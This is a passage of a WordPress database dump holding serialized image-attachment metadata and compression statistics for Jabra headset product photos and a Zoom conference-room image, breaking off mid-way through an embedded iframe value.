Class\":5:{s:7:\"percent\";d:13.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:24962;s:11:\"size_before\";i:190662;s:10:\"size_after\";i:165700;s:4:\"time\";d:0.460000000000000019984014443252817727625370025634765625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:36417;s:11:\"size_before\";i:317600;s:10:\"size_after\";i:281183;s:4:\"time\";d:0.5;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3281;s:11:\"size_before\";i:23582;s:10:\"size_after\";i:20301;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:8367;s:11:\"size_before\";i:60928;s:10:\"size_after\";i:52561;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:13657;s:11:\"size_before\";i:103396;s:10:\"size_after\";i:89739;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(5125,2877,'_wp_attached_file','2019/02/Jabra_Biz_2300_QD_Duo.png'),(5126,2877,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:350;s:4:\"file\";s:33:\"2019/02/Jabra_Biz_2300_QD_Duo.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_2300_QD_Duo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_2300_QD_Duo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_2300_QD_Duo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_2300_QD_Duo-350x300.png\";s:5:\"width\";i:350;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"Jabra_Biz_2300_QD_Duo-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5119,2875,'_wp_attached_file','2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg'),(5120,2875,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:41:\"2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"jabra_biz_2400_ii_mono_3-in-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"jabra_biz_2400_ii_mono_3-in-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"jabra_biz_2400_ii_mono_3-in-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:41:\"jabra_biz_2400_ii_mono_3-in-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:41:\"jabra_biz_2400_ii_mono_3-in-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:41:\"jabra_biz_2400_ii_mono_3-in-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:39:\"jabra_biz_2400_ii_mono_3-in-1-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5121,2875,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.132417239225485872111676144413650035858154296875;s:5:\"bytes\";i:11612;s:11:\"size_before\";i:64040;s:10:\"size_after\";i:52428;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:394;s:11:\"size_before\";i:3245;s:10:\"size_after\";i:2851;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1077;s:11:\"size_before\";i:7487;s:10:\"size_after\";i:6410;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:5535;s:11:\"size_before\";i:29001;s:10:\"size_after\";i:23466;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:573;s:11:\"size_before\";i:4009;s:10:\"size_after\";i:3436;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1497;s:11:\"size_before\";i:8007;s:10:\"size_after\";i:6510;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.629999999999999005240169935859739780426025390625;s:5:\"bytes\";i:2536;s:11:\"size_before\";i:12291;s:10:\"size_after\";i:9755;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(5122,2876,'_wp_attached_file','2019/02/Jabra_Biz_2300_QD.png'),(5123,2876,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:350;s:4:\"file\";s:29:\"2019/02/Jabra_Biz_2300_QD.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Jabra_Biz_2300_QD-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Jabra_Biz_2300_QD-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"Jabra_Biz_2300_QD-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"Jabra_Biz_2300_QD-350x300.png\";s:5:\"width\";i:350;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:27:\"Jabra_Biz_2300_QD-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5124,2876,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.5148008581496430480228809756226837635040283203125;s:5:\"bytes\";i:7660;s:11:\"size_before\";i:89961;s:10:\"size_after\";i:82301;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1385;s:11:\"size_before\";i:10064;s:10:\"size_after\";i:8679;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.36000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:2209;s:11:\"size_before\";i:29998;s:10:\"size_after\";i:27789;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.810000000000000053290705182007513940334320068359375;s:5:\"bytes\";i:313;s:11:\"size_before\";i:17316;s:10:\"size_after\";i:17003;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:3753;s:11:\"size_before\";i:32583;s:10:\"size_after\";i:28830;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}}}'),(5127,2877,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.8653450730215634933983892551623284816741943359375;s:5:\"bytes\";i:13503;s:11:\"size_before\";i:113802;s:10:\"size_after\";i:100299;s:4:\"time\";d:0.41000000000000003108624468950438313186168670654296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.370000000000000994759830064140260219573974609375;s:5:\"bytes\";i:1986;s:11:\"size_before\";i:12129;s:10:\"size_after\";i:10143;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:3822;s:11:\"size_before\";i:36810;s:10:\"size_after\";i:32988;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.79999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1833;s:11:\"size_before\";i:23511;s:10:\"size_after\";i:21678;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:5862;s:11:\"size_before\";i:41352;s:10:\"size_after\";i:35490;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(5136,2878,'_wp_attached_file','2019/02/Jabra_Biz_1500_DUO_USB.png'),(5137,2878,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:1400;s:4:\"file\";s:34:\"2019/02/Jabra_Biz_1500_DUO_USB.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Jabra_Biz_1500_DUO_USB-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"Jabra_Biz_1500_DUO_USB-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"Jabra_Biz_1500_DUO_USB-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"Jabra_Biz_1500_DUO_USB-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"Jabra_Biz_1500_DUO_USB-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"Jabra_Biz_1500_DUO_USB-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"Jabra_Biz_1500_DUO_USB-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"Jabra_Biz_1500_DUO_USB-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5138,2878,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.2946448491002946479255797385121695697307586669921875;s:5:\"bytes\";i:1532;s:11:\"size_before\";i:519948;s:10:\"size_after\";i:518416;s:4:\"time\";d:1.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:548;s:11:\"size_before\";i:9031;s:10:\"size_after\";i:8483;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:652;s:11:\"size_before\";i:26913;s:10:\"size_after\";i:26261;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:136824;s:10:\"size_after\";i:136824;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:225057;s:10:\"size_after\";i:225057;s:4:\"time\";d:0.5100000000000000088817841970012523233890533447265625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.180000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:332;s:11:\"size_before\";i:15256;s:10:\"size_after\";i:14924;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:39840;s:10:\"size_after\";i:39840;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:67027;s:10:\"size_after\";i:67027;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}}}'),(5139,2879,'_wp_attached_file','2019/02/Jabra_Biz_1500_DUO_QD.png'),(5140,2879,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:1400;s:4:\"file\";s:33:\"2019/02/Jabra_Biz_1500_DUO_QD.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_1500_DUO_QD-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_1500_DUO_QD-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_1500_DUO_QD-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"Jabra_Biz_1500_DUO_QD-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_1500_DUO_QD-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_1500_DUO_QD-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_1500_DUO_QD-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"Jabra_Biz_1500_DUO_QD-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5141,2879,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.262297496920766537442659682710655033588409423828125;s:5:\"bytes\";i:1282;s:11:\"size_before\";i:488758;s:10:\"size_after\";i:487476;s:4:\"time\";d:1.140000000000000124344978758017532527446746826171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.05999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:582;s:11:\"size_before\";i:8249;s:10:\"size_after\";i:7667;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.7399999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:429;s:11:\"size_before\";i:24588;s:10:\"size_after\";i:24159;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:126677;s:10:\"size_after\";i:126677;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:211072;s:10:\"size_after\";i:211072;s:4:\"time\";d:0.450000000000000011102230246251565404236316680908203125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.7800000000000000266453525910037569701671600341796875;s:5:\"bytes\";i:271;s:11:\"size_before\";i:15243;s:10:\"size_after\";i:14972;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:38325;s:10:\"size_after\";i:38325;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:64604;s:10:\"size_after\";i:64604;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(5142,2880,'_wp_attached_file','2019/02/Jabra_Biz_1500_DUO_QD-1.png'),(5143,2880,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:1400;s:4:\"file\";s:35:\"2019/02/Jabra_Biz_1500_DUO_QD-1.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Jabra_Biz_1500_DUO_QD-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Jabra_Biz_1500_DUO_QD-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"Jabra_Biz_1500_DUO_QD-1-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"Jabra_Biz_1500_DUO_QD-1-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"Jabra_Biz_1500_DUO_QD-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"Jabra_Biz_1500_DUO_QD-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"Jabra_Biz_1500_DUO_QD-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"Jabra_Biz_1500_DUO_QD-1-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5144,2880,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.262297496920766537442659682710655033588409423828125;s:5:\"bytes\";i:1282;s:11:\"size_before\";i:488758;s:10:\"size_after\";i:487476;s:4:\"time\";d:1.3600000000000000976996261670137755572795867919921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.05999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:582;s:11:\"size_before\";i:8249;s:10:\"size_after\";i:7667;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.7399999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:429;s:11:\"size_before\";i:24588;s:10:\"size_after\";i:24159;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:126677;s:10:\"size_after\";i:126677;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:211072;s:10:\"size_after\";i:211072;s:4:\"time\";d:0.460000000000000019984014443252817727625370025634765625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.7800000000000000266453525910037569701671600341796875;s:5:\"bytes\";i:271;s:11:\"size_before\";i:15243;s:10:\"size_after\";i:14972;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:38325;s:10:\"size_after\";i:38325;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:64604;s:10:\"size_after\";i:64604;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;}}}'),(5150,2881,'_elementor_version','0.4'),(6144,3048,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1542;s:6:\"height\";i:1044;s:4:\"file\";s:55:\"2019/03/Zoom-Conference-Room-Solutions_page2_image7.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:55:\"Zoom-Conference-Room-Solutions_page2_image7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:55:\"Zoom-Conference-Room-Solutions_page2_image7-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:55:\"Zoom-Conference-Room-Solutions_page2_image7-768x520.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:520;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:56:\"Zoom-Conference-Room-Solutions_page2_image7-1024x693.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:693;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:55:\"Zoom-Conference-Room-Solutions_page2_image7-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:55:\"Zoom-Conference-Room-Solutions_page2_image7-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:55:\"Zoom-Conference-Room-Solutions_page2_image7-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(5152,1532,'_oembed_85dcbdf00994fe31815c375e1ea83749','<iframe width=\"800\" height=\"450\" 